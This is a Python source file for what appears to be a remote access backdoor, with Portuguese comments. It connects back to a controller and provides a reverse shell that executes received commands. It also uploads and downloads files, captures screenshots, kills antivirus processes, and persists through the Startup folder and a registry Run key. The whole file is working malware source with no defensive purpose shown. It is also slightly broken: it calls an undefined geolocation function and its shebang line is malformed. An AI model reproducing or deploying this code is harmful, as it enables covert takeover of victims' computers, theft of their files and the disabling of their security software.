#!/bin/bash/env python3
import socket, os, time, subprocess, tempfile, random, threading
if(os.name == 'posix'): # try import propely screenshot module
try:
import pyscreenshot
except ImportError:
pass
elif(os.name == 'nt'):
try:
import ImageGrab
except ImportError:
pass
filename='backdoor.exe'
tempdir = tempfile.gettempdir()
def run(command):
command = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
return command.stdout.readlines()
def run_program(s , program_name):
if(os.path.isfile(program_name)):
sys = os.name
if(sys == 'nt'):
execute = 'start'
if('.exe' in program_name): # apenas executa o programa
command = program_name
else:
command = execute + ' ' + program_name
elif(sys == 'posix'):
execute = './'
command = execute + program_name
if('.py' in program_name):
execute = 'python '
command = execute + program_name
thread = threading.Thread(target=run, args = (command,), name='run')
thread.start()
s.send('0')
else: # arquivo não existe
s.send('1')
def screenshot(s):
name = tempdir + '/screenshot'+str(random.randint(0,1000000)) + '.png'
if(os.name == 'posix'): # se for unix-like
img = pyscreenshot.grab()
img.save(name)
elif(os.name == 'nt'): # se for windows
img = ImageGrab.grab()
img.save(name)
with open(name ,'rb') as f:
l = f.read(1024)
l = name + '+/-' + l
while(l):
s.send(l)
l = f.read(1024)
print('sent')
s.shutdown(socket.SHUT_WR)
os.remove(name)
def upload(s):
l = s.recv(1024)
filename = l.split('+/-')[0]
print(filename)
with open(filename,'wb') as f:
l = l.split('+/-')[1]
j = s.recv(1024)
l = l + j
while (l):
f.write(l)
l = s.recv(1024)
def shell(s):
while True:
data = s.recv(1024)
if(not data or data=='exit'):
break
if(data == 'shell'):
pass
else:
if(data.split(' ')[0] == 'cd'): # trocar de diretorio
try:
directory = (data.split(' ')[1])
if(os.path.isdir(directory)):
path = os.chdir(directory.rstrip('\n'))
local = os.getcwd()
s.send(local)
else:
s.send('caminho não existe\n'+ os.getcwd())
except Exception as e:
s.send('Error -> '+ e)
else:
command = subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # CRIAR THREADS PARA RODAR PROGRAMAS -> NÃO TER QUE ESPERAR O PROGRAMA FECHAR
ret = command.stdout.read() + command.stderr.read()
if(ret == ''):
s.send('done')
else:
s.send(ret)
def download(s):
filename = s.recv(1024)
print(filename)
if(os.path.isfile(filename)):
with open(filename, 'rb') as f:
l = f.read(1024)
l = 'True+/-' + l
while(l):
s.send(l)
l = f.read(1024)
print('sent')
s.shutdown(s.SHUT_WR)
else:
s.send('False')
def kill_antivirus():
with open('av.txt') as f:
avs = f.read()
avs = avs.split('\n')
processes = run('TASKLIST /FI "STATUS eq RUNNING"')
ps = []
for i in processes.split(' '):
if (".exe" in i):
ps.append(i.replace('K\n','').replace('\n',''))
for av in avs:
for p in ps:
if(p == av):
subprocess.Popen( "TASKKILL /F /IM \"{}\" >> NUL".format(p) ,shell=True)
def persistence(sys):
if(sys == 'nt'):
user = os.path.expanduser('~')
directory = '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
path = os.path.join(user, directory)
if(os.path.isdir(path)): # copia o backdoor para diretorio startup
subprocess.Popen('copy ' + filename + ' ' + path, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # CRIAR THREADS PARA RODAR PROGRAMAS -> NÃO TER QUE ESPERAR O PROGRAMA FECHAR
if(not os.getcwd() == tempdir): # salva backdoor no registro
subprocess.Popen('copy ' + filename + ' ' + tempdir, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # CRIAR THREADS PARA RODAR PROGRAMAS -> NÃO TER QUE ESPERAR O PROGRAMA FECHAR
FNULL = open(os.devnull,'w')
subprocess.Popen("REG ADD HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ /v backdoor /d " + tempdir + "\\" + filename, stdout=FNULL, stderr=FNULL)
elif(sys == 'posix'):
pass
def connect(ip, port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(r'[+] Conectado :)')
return s
except socket.error as erro:
return None
def execute(socket):
while True:
try:
data = socket.recv(1)
if(not data): # servidor desconectou, recomeça
return
else:
try:
if(data=='1'): # servidor envia arquivos para a vitma -> envio de novos virus
upload(socket)
elif(data=='2'): # shell reversa -> servidor se conecta a maquina do infectado
shell(socket)
elif(data=='3'): # Download
download(socket)
elif(data == '4'): # Killav
kill_antivirus()
elif(data == '5'): # screenshot
screenshot(socket)
elif(data == '6'):
programa = socket.recv(1024)
print(programa)
run_program(socket, programa)
elif(data == '7'):
geolocation(socket)
else:
print(data)
except:
return
except: # algum erro ocorreu, recomeça
return
def main():
ip = '127.0.0.1'
port = 1025
while (True):
connection = connect(ip, port)
if(connection):
execute(connection)
else:
time.sleep(5)
if __name__=='__main__':
if(os.name == 'nt'):
persistence('nt')
elif(os.name == 'posix'):
persistence('posix')
main()
